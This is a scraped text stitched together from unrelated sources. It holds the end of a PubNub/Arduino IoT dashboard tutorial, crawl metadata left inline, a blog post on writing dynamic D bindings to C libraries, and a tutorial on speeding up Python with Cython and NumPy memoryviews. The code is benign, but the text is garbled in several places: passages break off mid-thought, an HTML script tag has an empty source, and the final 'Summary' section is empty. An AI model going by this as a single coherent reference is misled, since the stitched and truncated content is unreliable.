//Then set up your Pyserial port connection with the following line: Arduino_Serial = serial.Serial('YOUR PORT NAME',9600, timeout=1) //Now create a PubNub Instance pnconfig.subscribe_key = "YOUR SUBSCRIBE KEY" pnconfig.publish_key = "YOUR PUBLISH KEY" pnconfig.ssl = False pubnub = PubNub(pnconfig) //Create a Publishing Callback def publish_callback(envelope, status): pass
Next, create the infinite loop of your program that continuously extracts and publishes data. We must be careful now as PySerial’s serial bus monitor is very blind and can only see data coming in serially. It cannot distinguish names or variables, only numbers separated by the ‘
’.
Since we are only going to work with two different sensor readings (temperature and humidity), we can expect the 1st line of data being from sensor A, the second by Sensor B, the third by Sensor A, the fourth by Sensor B, etc.
Going back to the Arduino sketch covered earlier, our temperature sensor is printing first in the code, so we can expect that the pattern will go temperature, then humidity, then repeat. Thus we should capture the data like so, using the correct syntax from Pyserial.
#read in data from the serial bus 5(depends on the length of target data) #characters at a time #NOTE: you must decode the data as serial code is different from human code! temp = str(Arduino_Serial.readline().decode('ascii')) hum = str(Arduino_Serial.readline().decode('ascii'))
Next, we should print the values to the terminal before publishing using PubNub in order to see if we’re getting legit data:
print(temp+ '
') print(hum + '
')
If everything is running smoothly, your terminal should look like this:
Notice: the alternation of data – 29 corresponds to temperature and 34 corresponds to humidity).
Now we’re going to publish this data to our real-time data visualization framework: PubNub EON. In order to send the data that EON can parse and graph, we must format the data first into a JSON format like so:
dictionary = {"eon": {"temp": temp, "hum": hum }}
Then we can publish to the same channel that the chart will later be subscribed to and we’ll be good to go!
pubnub.publish().channel("eon-chart").message(dictionary).pn_async(publish_callback)
HTML Graphical Representation Code
Now it’s time to use PubNub EON to display the readings in real time on a live chart.
To add PubNub EON to any HTML page, simply add this div tag in your body, which will inject the actual chart:
<div id="chart"></div>
Then import the script tag SDK:
<script src=""></script> <link rel="stylesheet" href=""/>
Then subscribe to the eon-chart channel that you will be posting data to:
eon.chart({ channels: ['eon-chart'], history: true, flow: true, pubnub: pubnub, generate: { bindto: '#chart', data: { labels: false } } });
And that’s it! You’ve now got a connected device collecting and streaming air quality readings in real time, and publishing them to a live dashboard, complete with threshold alerts! Your final result should look something like this:
Nice work! Want to explore other IoT use cases? Check out the tutorials below: | https://www.pubnub.com/blog/diy-air-quality-monitoring-system-with-realtime-readings-and-live-alerts/ | CC-MAIN-2021-17 | refinedweb | 2,071 | 55.03 |
, they can also be linked with dynamic libraries at compile time. In the C or C++ world, it is quite common when using shared libraries to link them at compile time. On Windows, this is done via an import library. Given an application "Foo" that makes use of the DLL "Bar", when "Foo" is compiled it will be linked with an import library named Bar.lib. This will cause the DLL to be loaded automatically by the operating system when the application is executed. The same thing can be accomplished on Posix systems by linking directly with the shared object file (extending the example, that would be libBar.so in this case). So with a static binding in D, a program can be linked at compile time with the static library Bar.lib (Windows) or libBar.a (Posix) for static linkage, or the import library Bar.lib (Windows) or libBar.so (Posix) for dynamic linkage.
A dynamic binding can not be linked to anything at compile time. No static libraries, no import libraries, no shared objects. It is designed explicitly for loading a shared library manually at run time. In the C and C++ world, this technique is often used to implement plugin systems, or to implement hot swapping of different application subsystems (for example, switching between called. As long as it is in the currently visible namespace, it's callable. However, when linking with a C library, we don't have access to any function implementations (nor, actually, to the declarations--hence the binding). They are external to the application. In order to call into that library, the D compiler needs to be made aware of the existence of the functions that need to be called so that, at link time, it can match up the proper address offsets to make the call. This is the only case I can think of in D where a function declaration isn't just useful, but required.
I explained linkage attributes in.
int foo(int i) { return i; } void main() { int function(int) fooPtr; fooPtr = &foo; alias int function(int) da_fooPtr; da_fooPtr fooPtr2 = &foo; import std.stdio; writeln(fooPtr(1)); writeln(fooPtr2(2)); }There is none! At least, not on the surface. I'll get into that later. Let's look at another example. Translating a C callback into D.
// In C, foo.h typedef int (*MyCallback)(void); // In D extern( C ) alias int function() MyCallback;Notice that I used the alias form here. Anytime you declare a typedefed C function pointer in D, it should be aliased so that it can be used the same way. Finally, the case of function pointers declared inline in a paramter list.
// In C, foo.h extern void foo(int (*BarPtr)(int)); // In D. // Option 1 extern( C ) void foo(int function(int) BarPtr); // Option 2 extern( C ) alias int function(int) BarPtr; extern( C ) void foo(BarPtr);Personally, I prefer option is function pointer initialization.
In one of the examples above (fooPtr), I showed how a function pointer can be declared and initialized. But in that example, it is obvious to the compiler that the function foo and the pointer fooPtr have the same basic signature (return type and parameter list). Now consider this example.
// This is all D. int foo() { return 1; } void* getPtr() { return cast(void*)&foo; } void main() { int function() fooPtr; fooPtr = getPtr(); .
I implied above that there was more than one possible solution. Here's the second one.
int foo() { return 1; }void* getPtr() { return cast(void*)&foo; }void bindFunc(void** func) { *func = getPtr(); }void main() { int function() fooPtr; bindFunc(cast(void**)&fooPtr); }Here, the address of fooPtr is being taken (giving us, essentially, a foo**) and cast to void**. Then bind func is able to dereference the pointer and assign it the void* value without a cast. When I first implemented Derelict, I used the alias approach. In Derelict 2, Tomasz Stachowiak implemented a new loader using the void** technique. That worked well. And, as a bonus, it eliminated a great many alias declarations from the codebase. Until something happened that, while a good thing for many users of D on Linux, turned out to be a big headache for me.
For several years, DMD did not provide a stack trace when exceptions were thrown. Then, some time ago, a release was made that implemented stack traces on Linux. The downside was that it was done in a way that broke Derelict 2 completely on that platform. To make a long story short, the DMD configuration files were preconfigured to export all symbols when compiling any binaries, be they shared objects or executables. Without this, the stack trace implementation wouldn't work. This caused every function pointer in Derelict to clash with every function exported by the bound libraries. In other words. the function pointer glClear in Derelict 2 suddenly started to conflict with the actual glClear function in the shared library, even though the library was loaded manually (which, given my Windows background, makes absolutely no sense to me whatsoever). So, I had to go back to the aliased function pointers. Aliased function pointers and variables declared of their type aren't exported. If you are going to make a publicly available dynamic binding, this is something you definitely need to keep in mind.
I still use the void** style to load function pointers, despite having switched back to aliases. It was less work than converting everything to a direct load. And when I implemented Derelict 3, I kept it that way. So if you look at the Derelict loaders...
// Instead of seeing this foo = cast(da_Foo)getSymbol("foo"); // You'll see this foo = bindFunc(cast(void**)&foo, "foo");I don't particularly advocate one over the other when implementing a binding with the aid of a script. But if you're doing it by hand, the latter is much more amenable to quick copy-pasting.
There's one more important issue to discuss. Given that a dynamic binding uses function pointers, the pointers are subject to D's rules for variable storage. And by default, all variables in D are stashed in Thread-Local Storage. What that means is that, by default, each thread gets its own copy of the variable. So if a binding just blindly declares function pointers, then they are loaded in one thread and called in another... boom! Thankfully, D's function pointers are default initialized to null, so all you get is an access violation and not a call into random memory somewhere. The solution here is to let D know that the function pointers need to be shared across all threads. We can do that using one of two keywords: shared or __gshared.
One of the goals of D is to make concurrency easier than it traditionally has been in C-like languages. The shared type qualifier is intended to work toward that goal. When using it, you are telling the compiler that a particular variable is intended to be used across threads. The compiler can then complain if you try to access it in a way that isn't thread-safe. But like D's immutable and const , shared is transitive. That means if you follow any references from a shared object, they must also be shared. There are a number of issues that have yet to be worked out, so it hasn't seen a lot of practical usage that I'm aware of. And that's where __gshared comes in.
When you tell the compiler that a piece of data is __gshared, you are saying, "Hey, Mr. Compiler, I want to share this data across threads, but I don't want you to pay any attention to how I use it, mmkay?" Essentially, it's no different from a normal variable in C or C++. If you want to share a __gshared variable across threads, it's your responsibility to make sure it's properly synchronized. The compiler isn't going to help you.
So when implementing a dynamic binding, a decision has to be made: thread-local (default), shared, or __gshared. My answer is __gshared. If we pretend that our function pointers are actual functions, which are accessible across threads anyway, then there isn't too much to worry about. Care still need be taken to ensure that the functions are loaded before any other threads try to access them and that no threads try to access them after the bound library is unloaded. In Derelict, I do this with static module constructors and destructors (which can still lead to some issues during program shutdown, but I'll cover that in a separate post). Here's an example.
extern( C ) { alias void function(int) da_foo; alias int function() da_bar; } __gshared { da_foo foo; da_bar bar; }Finally, there's the question of how to load the library. That, I'm afraid, is an exercise for the reader. In Derelict, I implemented a utility package (DerelictUtil) that abstracts the platform APIs for loading shared libraries and fetching their symbols. The abstraction is behind a set of free functions that can be used directly or via a convenient object interface. In Derelict itself, I use the latter since it makes managing loading an entire library easier. But in external projects, I often use the free-function interface for loading one or two functions at a time (such as certain Win32 functions that aren't available in the ancient libs shipped with DMD). It also supports selective loading, which is a term I use for being able to load a library if specific functions are missing (the default behavior is to throw an exception when an expected symbol fails to load).
Conclusion
Overall, there's a good deal of work involved in implementing any sort of binding in D. But I think it's obvious that dynamic bindings require quite some extra effort. This is especially true given that the automated tools I've seen so far are all geared toward generating static bindings. I've only recently begun to use custom scripts myself, but they still require a bit of manual preparation because I don't want to deal with a full-on C parser. That said, I prefer dynamic bindings myself. I like having the ability to load and unload at will and to have the opportunity to present my own error message to the user when a library is missing. Others disagree with me and prefer to use static bindings. That's perfectly fine.
At this point, static and dynamic bindings exist for several popular libraries already. Deimos is a collection of the former and Derelict 3 the latter.!
Here's a third solution:
and in bindFunc, "ref void* func" could be used instead of void**, that's a little nicer imho.
What would be really cool is if someone could come up with a compile-time only system which allows to write one binding and compile it to dynamic/static binding depending on a version statement: | http://www.gamedev.net/blog/1140/entry-2255632-binding-d-to-c-part-five/ | CC-MAIN-2014-35 | refinedweb | 1,838 | 64.1 |
copyfile(3) BSD Library Functions Manual copyfile(3)
NAME
copyfile, fcopyfile, copyfile_state_alloc, copyfile_state_free, copyfile_state_get, copyfile_state_set -- copy a file
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <copyfile.h> int copyfile(const char *from, const char *to, copyfile_state_t state, copyfile_flags_t flags); int fcopyfile(int from, int to, copyfile_state_t state, copyfile_flags_t flags); copyfile_state_t copyfile_state_alloc(void); int copyfile_state_free(copyfile_state_t state); int copyfile_state_get(copyfile_state_t state, uint32_t flag, void * dst); int copyfile_state_set(copyfile_state_t state, uint32_t flag, const void * src); typedef int (*copyfile_callback_t)(int what, int stage, copyfile_state_t state, const char * src, const char * dst, void * ctx);
DESCRIPTION
These functions are used to copy a file's data and/or metadata. (Meta- data consists of permissions, extended attributes, access control lists, and so forth.) The copyfile_state_alloc() function initializes a copyfile_state_t object (which is an opaque data type). This object can be passed to copyfile() and fcopyfile(); copyfile_state_get() and copyfile_state_set() can be used to manipulate the state (see below). The copyfile_state_free() function is used to deallocate the object and its contents. The copyfile() function can copy the named from file to the named to file; the fcopyfile() function does the same, but using the file descrip- tors of already-opened files. If the state parameter is the return value from copyfile_state_alloc(), then copyfile() and fcopyfile() will use the information from the state object; if it is NULL, then both functions will work normally, but less control will be available to the caller. The flags parameter controls which contents are copied: COPYFILE_ACL Copy the source file's access control lists. COPYFILE_STAT Copy the source file's POSIX information (mode, modifica- tion time, etc.). COPYFILE_XATTR Copy the source file's extended attributes. COPYFILE_DATA Copy the source file's data. These values may be or'd together; several convenience macros are pro- vided: COPYFILE_SECURITY Copy the source file's POSIX and ACL information; equivalent to (COPYFILE_STAT|COPYFILE_ACL). COPYFILE_METADATA Copy the metadata; equivalent to (COPYFILE_SECURITY|COPYFILE_XATTR). COPYFILE_ALL Copy the entire file; equivalent to (COPYFILE_METADATA|COPYFILE_DATA). The copyfile() and fcopyfile() functions can also have their behavior modified by the following flags: COPYFILE_RECURSIVE Causes copyfile() to recursively copy a hierarchy. This flag is not used by fcopyfile(); see below for more information. COPYFILE_CHECK Return a bitmask (corresponding to the flags argu- ment) indicating which contents would be copied; no data are actually copied. (E.g., if flags was set to COPYFILE_CHECK|COPYFILE_METADATA, and the from file had extended attributes but no ACLs, the return value would be COPYFILE_XATTR .) COPYFILE_PACK Serialize the from file. The to file is an Apple- Double-format file. COPYFILE_UNPACK Unserialize the from file. The from file is an AppleDouble-format file; the to file will have the extended attributes, ACLs, resource fork, and FinderInfo data from the to file, regardless of the flags argument passed in. COPYFILE_EXCL Fail if the to file already exists. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW_SRC Do not follow the from file, if it is a symbolic link. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW_DST Do not follow the to file, if it is a symbolic link. (This is only applicable for the copyfile() function.) COPYFILE_MOVE Unlink (using remove(3)) the from file. (This is only applicable for the copyfile() function.) No error is returned if remove(3) fails. Note that remove(3) removes a symbolic link itself, not the target of the link. COPYFILE_UNLINK Unlink the to file before starting. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW This is a convenience macro, equivalent to (COPYFILE_NOFOLLOW_DST|COPYFILE_NOFOLLOW_SRC). The copyfile_state_get() and copyfile_state_set() functions can be used to manipulate the copyfile_state_t object returned by copyfile_state_alloc(). In both functions, the dst parameter's type depends on the flag parameter that is passed in. COPYFILE_STATE_SRC_FD COPYFILE_STATE_DST_FD Get or set the file descriptor associated with the source (or destination) file. If this has not been initialized yet, the value will be -2. The dst (for copyfile_state_get()) and src (for copyfile_state_set()) parameters are point- ers to int. COPYFILE_STATE_SRC_FILENAME COPYFILE_STATE_DST_FILENAME Get or set the filename associated with the source (or destination) file. If it has not been initialized yet, the value will be NULL. For copyfile_state_set(), the src parameter is a pointer to a C string (i.e., char* ); copyfile_state_set() makes a pri- vate copy of this string. For copyfile_state_get() function, the dst parameter is a pointer to a pointer to a C string (i.e., char** ); the returned value is a pointer to the state 's copy, and must not be modified or released. COPYFILE_STATE_STATUS_CB Get or set the callback status function (currently only used for recursive copies; see below for details). The src parameter is a pointer to a function of type copyfile_callback_t (see above). COPYFILE_STATE_STATUS_CTX Get or set the context parameter for the status call-back function (see below for details). The src parameter is a void *. COPYFILE_STATE_QUARANTINE Get or set the quarantine information with the source file. The src parameter is a pointer to an opaque object (type void * ). COPYFILE_STATE_COPIED Get the number of data bytes copied so far. (Only valid for copyfile_state_get(); see below for more details about callbacks.) The dst parameter is a pointer to off_t (type off_t * ). COPYFILE_STATE_XATTRNAME Get the name of the extended attribute dur- ing a callback for COPYFILE_COPY_XATTR (see below for details). This field cannot be set, and may be NULL.
Recursive Copies
When given the COPYFILE_RECURSIVE flag, copyfile() (but not fcopyfile()) will use the fts(3) functions to recursively descend into the source file-system object. It then calls copyfile() on each of the entries it finds that way. If a call-back function is given (using copyfile_state_set() and COPYFILE_STATE_STATUS_CB ), the call-back func- tion.) The call-back function will have one of the following values as the first argument, indicating what is being copied: COPYFILE_RECURSE_FILE The object being copied is a file (or, rather, something other than a directory). COPYFILE_RECURSE_DIR The object being copied is a directory, and is being entered. (That is, none of the filesystem objects contained within the directory have been copied yet.) COPYFILE_RECURSE_DIR_CLEANUP The object being copied is a directory, and all of the objects contained have been copied. At this stage, the destination directory being copied will have any extra permissions that were added to allow the copying will be removed. COPYFILE_RECURSE_ERROR There was an error in processing an element of the source hierarchy; this happens when fts(3) returns an error or unknown file type. (Currently, the second argument to the call-back function will always be COPYFILE_ERR in this case.) The second argument to the call-back function will indicate the stage of the copy, and will be one of the following values: COPYFILE_START Before copying has begun. The third parameter will be a newly-created copyfile_state_t object with the call-back function and context pre-loaded. COPYFILE_FINISH After copying has successfully finished. COPYFILE_ERR Indicates an error has happened at some stage. If the first argument to the call-back function is COPYFILE_RECURSE_ERROR, then an error occurred while processing the source hierarchy; otherwise, it will indicate what type of object was being copied, and errno will be set to indicate the error. The fourth and fifth parameters are the source and destination paths that are to be copied (or have been copied, or failed to copy, depending on the second argument). The last argument to the call-back function will be the value set by COPYFILE_STATE_STATUS_CTX, if any. The call-back function is required to return one of the following values: COPYFILE_CONTINUE The copy will continue as expected. COPYFILE_SKIP This object will be skipped, and the next object will be processed. (Note that, when entering a directory. returning COPYFILE_SKIP from the call-back function will prevent the contents of the directory from being copied.) COPYFILE_QUIT The entire copy is aborted at this stage. Any filesystem objects created up to this point will remain. copyfile() will return -1, but errno will be unmodified. The call-back function must always return one of the values listed above; if not, the results are undefined. The call-back function will be called twice for each object (and an addi- tional two times for directory cleanup); the first call will have a stage parameter of COPYFILE_START; the second time, that value will be either COPYFILE_FINISH or COPYFILE_ERR to indicate a successful completion, or an error during processing. In the event of an error, the errno value will be set appropriately. The COPYFILE_PACK, COPYFILE_UNPACK, COPYFILE_MOVE, and COPYFILE_UNLINK flags are not used during a recursive copy, and will result in an error being returned.
Progress Callback
In addition to the recursive callbacks described above, copyfile() and fcopyfile() will also use a callback to report data (e.g., COPYFILE_DATA) progress. If given, the callback will be invoked on each write(2) call. The first argument to the callback function will be COPYFILE_COPY_DATA. The second argument will either be COPYFILE_PROGRESS (indicating that the write was successful), or COPYFILE_ERR (indicating that there was an error of some sort). The amount of data bytes copied so far can be retrieved using copyfile_state_get(), with the COPYFILE_STATE_COPIED requestor (the argu- ment type is a pointer to off_t ). When copying extended attributes, the first argument to the callback function will be COPYFILE_COPY_XATTR. The other arguments will be as described for COPYFILE_COPY_DATA; the name of the extended attribute being copied may be retrieved using copyfile_state_get() and the parame- ter COPYFILE_STATE_XATTRNAME. When using COPYFILE_PACK, the callback may be called with COPYFILE_START for each of the extended attributes first, followed by COPYFILE_PROGRESS before getting and packing the data for each individual attribute, and then COPYFILE_FINISH when finished with each individual attribute. (That is, COPYFILE_START may be called for all of the extended attributes, before the first callback with COPYFILE_PROGRESS is invoked.) Any attribute skipped by returning COPYFILE_SKIP from the COPYFILE_START callback will not be placed into the packed output file. The return value for the data callback must be one of COPYFILE_CONTINUE The copy will continue as expected. (In the case of error, it will attempt to write the data again.) COPYFILE_SKIP The data copy will be aborted, but without error. COPYFILE_QUIT The data copy will be aborted; in the case of COPYFILE_PROGRESS, errno will be set to ECANCELED. While the src and dst parameters will be passed in, they may be NULL in the case of fcopyfile().
RETURN VALUES
Except when given the COPYFILE_CHECK flag, copyfile() and fcopyfile() return less than 0 on error, and 0 on success. All of the other func- tions return 0 on success, and less than 0 on error.
WARNING
Both copyfile() and fcopyfile() can copy symbolic links; there is a gap between when the source link is examined and the actual copy is started, and this can be a potential security risk, especially if the process has elevated privileges. When performing a recursive copy, if the source hierarchy changes while the copy is occurring, the results are undefined. fcopyfile() does not reset the seek position for either source or desti- nation. This can result in the destination file being a different size than the source file.
ERRORS
copyfile() and fcopyfile() will fail if: [EINVAL] An invalid flag was passed in with COPYFILE_RECURSIVE. [EINVAL] The from or to parameter to copyfile() was a NULL pointer. [EINVAL] The from or to parameter to copyfile() was a negative number. [ENOMEM] A memory allocation failed. [ENOTSUP] The source file was not a directory, symbolic link, or regular file. [ECANCELED] The copy was cancelled by callback. In addition, both functions may set errno via an underlying library or system call.
EXAMPLES
/*);
SEE ALSO
listxattr(2), getxattr(2), setxattr(2), acl(3)
BUGS
Both copyfile() functions lack a way to set the input or output block size. Recursive copies do not honor hard links.
HISTORY
The copyfile() API was introduced in Mac OS X 10.5. BSD April 27, 2006 BSD
Mac OS X 10.8 - Generated Mon Aug 27 16:33:41 CDT 2012 | http://www.manpagez.com/man/3/copyfile/ | CC-MAIN-2020-05 | refinedweb | 1,973 | 55.13 |
I have added 2 missing intrinsics _cvtss_sh and _mm_cvtps_ph to the intrinsics header f16intrin.h.
GCC has these intrinsics in f16cintrin.h. Here is the definition:
extern __inline float __attribute__((__gnu_inline__, __always_inline__, __artificial__))
_cvtsh_ss (unsigned short __S)
{
__v8hi __H = __extension__ (__v8hi){ __S, 0, 0, 0, 0, 0, 0, 0 };
__v4sf __A = __builtin_ia32_vcvtph2ps (__H);
return __builtin_ia32_vec_ext_v4sf (__A, 0);
`}
#ifdef __OPTIMIZE__
extern __inline unsigned short __attribute__((__gnu_inline__, __always_inline__, __artificial__))
_cvtss_sh (float __F, const int __I)
{
__v4sf __A = __extension__ (__v4sf){ __F, 0, 0, 0 };
__v8hi __H = __builtin_ia32_vcvtps2ph (__A, __I);
return (unsigned short) __builtin_ia32_vec_ext_v8hi (__H, 0);
`}
#else
#define _cvtss_sh(__F, __I) \
(__extension__ \
({ \
__v4sf __A = __extension__ (__v4sf){ __F, 0, 0, 0 }; \
__v8hi __H = __builtin_ia32_vcvtps2ph (__A, __I); \
(unsigned short) __builtin_ia32_vec_ext_v8hi (__H, 0); \
}))
#endif /* __OPTIMIZE */
Intel's documentation expects _cvtsh_ss to have 2 parameters (instead of one)
but most likely the documentation is wrong, because Intel’s' headers contain these intrinsic prototypes in emmintrin.h
extern float __ICL_INTRINCC _cvtsh_ss(unsigned short);
extern unsigned short __ICL_INTRINCC _cvtss_sh(float, int);
BTW, emmintrin.h includes f16cintrin.h, so it should be OK to place these 2 intrinsics in f16cintrin.h. This should satisfy both Intel's and GCC's expectations.
Clang generates the following IR for cvtsh_ss (see below). In the test I simply checked that the builtin @llvm.x86.vcvtph2ps.128 is generated for _cvtsh_ss. I was afraid that checks for initialization of the vector 'v' might be too lengthy and the IR is prone to change frequently, so I didn't add these checks. However, if you think that this is important and it won't create too much headache because IR will keep changing over time, I could certainly add them.
The same goes for test_cvtss_sh.
static __inline float __DEFAULT_FN_ATTRS
cvtsh_ss(unsigned short a)
{
__v8hi v = {(short)a, 0, 0, 0, 0, 0, 0, 0};
__v4sf r = __builtin_ia32_vcvtph2ps(v);
return r[0];
}
define float @test_cvtsh_ss(i16 zeroext %a) #0 {
entry:
%a.addr.i = alloca i16, align 2
%v.i = alloca <8 x i16>, align 16
%r.i = alloca <4 x float>, align 16
%a.addr = alloca i16, align 2
store i16 %a, i16* %a.addr, align 2
%0 = load i16, i16* %a.addr, align 2
store i16 %0, i16* %a.addr.i, align 2
%1 = load i16, i16* %a.addr.i, align 2
%vecinit.i = insertelement <8 x i16> undef, i16 %1, i32 0
%vecinit1.i = insertelement <8 x i16> %vecinit.i, i16 0, i32 1
%vecinit2.i = insertelement <8 x i16> %vecinit1.i, i16 0, i32 2
%vecinit3.i = insertelement <8 x i16> %vecinit2.i, i16 0, i32 3
%vecinit4.i = insertelement <8 x i16> %vecinit3.i, i16 0, i32 4
%vecinit5.i = insertelement <8 x i16> %vecinit4.i, i16 0, i32 5
%vecinit6.i = insertelement <8 x i16> %vecinit5.i, i16 0, i32 6
%vecinit7.i = insertelement <8 x i16> %vecinit6.i, i16 0, i32 7
store <8 x i16> %vecinit7.i, <8 x i16>* %v.i, align 16
%2 = load <8 x i16>, <8 x i16>* %v.i, align 16
%3 = call <4 x float> @llvm.x86.vcvtph2ps.128(<8 x i16> %2) #2
store <4 x float> %3, <4 x float>* %r.i, align 16
%4 = load <4 x float>, <4 x float>* %r.i, align 16
%vecext.i = extractelement <4 x float> %4, i32 0
ret float %vecext.i
}
Adding cfe-commits as a subscriber.
Would it be possible to do this without temporaries? Temporaries in macros can cause -Wshadow warnings if the macro is used multiple times.
Craig, thank you for the review. Here are the changes that you requested.
Katya.
Can we do something like this to remove the last temporary?
#define _cvtss_sh(a, imm) extension ({ \
(unsigned short)((__v8hi)__builtin_ia32_vcvtps2ph((__v4sf){a, 0, 0, 0}, (imm))[0]); \
})
Updated patch to address Craig's comments.
Hi Craig,
I should have looked how it's done just a few lines below. Sorry.
I had to slightly modify the body of the define that you proposed by adding an additional pair of round brackets, otherwise I got compilation errors like this:
~/ngh/ToT_commit/build/bin/clang intr.cpp -mf16c intr.cpp:10:7:
error: C-style cast from scalar 'short' to vector '__v8hi'
(vector of 8 'short' values) of different size
a = _cvtss_sh(res, imm);
^~~~~~~~~~~~~~~~~~~
~/ngh/ToT_commit/build/bin/../lib/clang/3.8.0/include/f16cintrin.h:43:20: note:
expanded from macro '_cvtss_sh'
(unsigned short)((__v8hi)__builtin_ia32_vcvtps2ph((__v4sf){a, 0, 0, 0}, \
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
intr.cpp:10:5: error: assigning to 'unsigned short' from incompatible type
'void'
a = _cvtss_sh(res, imm);
^ ~~~~~~~~~~~~~~~~~~~
2 errors generated.
I further simplified the macros by removing the statement for the define that I added (_cvtss_sh) and for the one that was there before (_mm_cvtps_ph).
I also formatted __DEFAULT_FN_ATTRS macro to comply with 80 characters limitation.
Craig, do you think it's necessary to make the tests more fancy by checking how the vector is initialized before the builtin invocation and/or that one element is extracted from the vector after the builtin returned a value? It will add additional 10-15 check lines to each test. My concern is that these additional lines might change from time to time.
I agree that the vector initialization code will be prone to changing. I think what you have is fine.
LGTM | https://reviews.llvm.org/D16177 | CC-MAIN-2021-31 | refinedweb | 870 | 67.76 |
freud.density.GaussianDensity¶
The
freud.density module is intended to compute a variety of quantities that relate spatial distributions of particles with other particles. In this notebook, we demonstrate
freud’s Gaussian density calculation, which provides a way to interpolate particle configurations onto a regular grid in a meaningful way that can then be processed by other algorithms that require regularity, such as a Fast Fourier Transform.
[1]:
import numpy as np from scipy import stats import freud import matplotlib.pyplot as plt
To illustrate the basic concept, consider a toy example: a simple set of point particles with unit mass on a line. For analytical purposes, the standard way to accomplish this would be using Dirac delta functions.
[2]:
n_p = 10000 np.random.seed(129) x = np.linspace(0, 1, n_p) y = np.zeros(n_p) points = np.random.rand(10) y[(points*n_p).astype('int')] = 1 plt.plot(x, y); plt.show()
However, delta functions can be cumbersome to work with, so we might instead want to smooth out these particles. One option is to instead represent particles as Gaussians centered at the location of the points. In that case, the total particle density at any point in the interval \([0, 1]\) represented above would be based on the sum of the densities of those Gaussians at those points.
[3]:
# Note that we use a Gaussian with a small standard deviation # to emphasize the differences on this small scale dists = [stats.norm(loc=i, scale=0.1) for i in points] y_gaussian = 0 for dist in dists: y_gaussian += dist.pdf(x) plt.plot(x, y_gaussian); plt.show()
The goal of the GaussianDensity class is to perform the same interpolation for points on a 2D or 3D grid, accounting for Box periodicity.
[4]:
N = 1000 # Number of points L = 10 # Box length box, points = freud.data.make_random_system(L, N, is2D=True, seed=0)_2<<
The effects are much more striking if we explicitly construct our points to be centered at certain regions.
[5]:
N = 1000 # Number of points L = 10 # Box length box = freud.box.Box.square(L) centers = np.array([[L/4, L/4, 0], [-L/4, L/4, 0], [L/4, -L/4, 0], [-L/4, -L/4, 0]]) points = [] for center in centers: points.append(np.random.multivariate_normal(center, cov=np.diag([1, 1, 0]), size=(int(N/4),))) points = box.wrap(np.concatenate(points))_3<< | https://freud.readthedocs.io/en/fix-rtd-libgfortran-version/gettingstarted/examples/module_intros/density.GaussianDensity.html | CC-MAIN-2021-21 | refinedweb | 399 | 58.08 |
Cython¶
Like Numba, Cython provides an approach to generating fast compiled code that can be used from Python.
As was the case with Numba, a key problem is the fact that Python is dynamically typed.
As you’ll recall, Numba solves this problem (where possible) by inferring type.
Cython’s approach is different — programmers add type definitions directly to their “Python” code.
As such, the Cython language can be thought of as Python with type definitions.
In addition to a language specification, Cython is also a language translator, transforming Cython code into optimized C and C++ code.
Cython also takes care of building language extensions — the wrapper code that interfaces between the resulting compiled code and Python.
Important Note:
In what follows code is executed in a Jupyter notebook.
This is to take advantage of a Cython cell magic that makes Cython particularly easy to use.
Some modifications are required to run the code outside a notebook.
- See the book Cython by Kurt Smith or the online documentation.
A First Example¶
Let’s start with a rather artificial example.
Suppose that we want to compute the sum $ \sum_{i=0}^n \alpha^i $ for given $ \alpha, n $.
Suppose further that we’ve forgotten the basic formula$$ \sum_{i=0}^n \alpha^i = \frac{1 - \alpha^{n+1}}{1 - \alpha} $$
for a geometric progression and hence have resolved to rely on a loop.
def geo_prog(alpha, n): current = 1.0 sum = current for i in range(n): current = current * alpha sum = sum + current return sum
This works fine but for large $ n $ it is slow.
Here’s a C function that will do the same thing
double geo_prog(double alpha, int n) { double current = 1.0; double sum = current; int i; for (i = 1; i <= n; i++) { current = current * alpha; sum = sum + current; } return sum; }
If you’re not familiar with C, the main thing you should take notice of is the type definitions
intmeans integer
doublemeans double precision floating-point number
- the
doublein
double geo_prog(...indicates that the function will return a double
Not surprisingly, the C code is faster than the Python code.
%load_ext Cython
In the next cell, we execute the following
%%cython def geo_prog_cython(double alpha, int n): cdef double current = 1.0 cdef double sum = current cdef int i for i in range(n): current = current * alpha sum = sum + current return sum
Here
cdef is a Cython keyword indicating a variable declaration and is followed by a type.
The
%%cython line at the top is not actually Cython code — it’s a Jupyter cell magic indicating the start of Cython code.
After executing the cell, you can now call the function
geo_prog_cython from within Python.
What you are in fact calling is compiled C code with a Python call interface
import quantecon as qe qe.util.tic() geo_prog(0.99, int(10**6)) qe.util.toc()
TOC: Elapsed: 0:00:0.12
0.12008047103881836
qe.util.tic() geo_prog_cython(0.99, int(10**6)) qe.util.toc()
TOC: Elapsed: 0:00:0.05
0.051430463790893555
Example 2: Cython with NumPy Arrays¶
Let’s go back to the first problem that we worked with: generating the iterates of the quadratic map$$ x_{t+1} = 4 x_t (1 - x_t) $$
The problem of computing iterates and returning a time series requires us to work with arrays.
The natural array type to work with is NumPy arrays.
Here’s a Cython implementation that initializes, populates and returns a NumPy array
%%cython import numpy as np def qm_cython_first_pass(double x0, int n): cdef int t x = np.zeros(n+1, float) x[0] = x0 for t in range(n): x[t+1] = 4.0 * x[t] * (1 - x[t]) return np.asarray(x)
If you run this code and time it, you will see that its performance is disappointing — nothing like the speed gain we got from Numba
qe.util.tic() qm_cython_first_pass(0.1, int(10**5)) qe.util.toc()
TOC: Elapsed: 0:00:0.04
0.04188847541809082
This example was also computed in the Numba lecture, and you can see Numba is around 90 times faster.
The reason is that working with NumPy arrays incurs substantial Python overheads.
We can do better by using Cython’s typed memoryviews, which provide more direct access to arrays in memory.
When using them, the first step is to create a NumPy array.
Next, we declare a memoryview and bind it to the NumPy array.
Here’s an example:
%%cython import numpy as np from numpy cimport float_t def qm_cython(double x0, int n): cdef int t x_np_array = np.zeros(n+1, dtype=float) cdef float_t [:] x = x_np_array x[0] = x0 for t in range(n): x[t+1] = 4.0 * x[t] * (1 - x[t]) return np.asarray(x)
Here
cimportpulls in some compile-time information from NumPy
cdef float_t [:] x = x_np_arraycreates a memoryview on the NumPy array
x_np_array
- the return statement uses
np.asarray(x)to convert the memoryview back to a NumPy array
Let’s time it:
qe.util.tic() qm_cython(0.1, int(10**5)) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.0008900165557861328
This is fast, although still slightly slower than
qm_numba.
Summary¶
